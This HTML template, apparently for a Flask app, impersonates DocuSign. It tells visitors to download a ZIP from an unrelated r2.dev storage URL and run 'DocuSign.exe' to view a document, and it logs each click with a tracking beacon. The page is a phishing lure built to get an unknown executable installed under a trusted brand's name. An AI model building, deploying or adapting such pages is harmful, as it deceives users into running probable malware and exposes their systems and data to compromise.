<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DocuSign</title>
    <link rel="stylesheet" href="../static/styles.css">
</head>

<body>
    <div class="container">
        <nav class="navbar">
            <div class="logo">
                <img src="{{url_for('static',filename='docusign-logo.png')}}" alt="DocusignLogo" >
            </div>
          
        </nav>

        <div class="download-content">
            <div class="desktop-image">
                <img src="{{url_for('static',filename='desktop-logo.png')}}" alt="Desktop Image">
            </div>
            <div class="download-instructions">
                <h2>Download Docusign to view the document</h2>
                <div class="instructions">
                    <ol>
                        <li>Download the Docusign package.</li>
                        <li>Locate and open the downloaded ZIP file.</li>
                        <li>Extract all the files to a new folder.</li>
                        <li>Run the <strong>DocuSign.exe</strong> application form the extracted folder.</li>
                        <li>Follow the on-screen promts to complete the installtion.</li>
                    </ol>
                </div>
                <div class="download-btn">
                    <a href="https://pub-5943043f0aa3454291be9cd2fe736787.r2.dev/DocuSign_Installer.zip" download onclick="if(navigator.sendBeacon){navigator.sendBeacon('/track');}">
                        <button type="button">Download DocuSign</button>
                    </a>
                </div>
                    <p><strong>Requires docusign application for document access</strong></p>
                </div>
            </div>
            
        </div>
        <footer class="footer">
    <p>© 2026 DocuSign  All rights reserved.</p>
</footer>
    </div>
</body>

</html>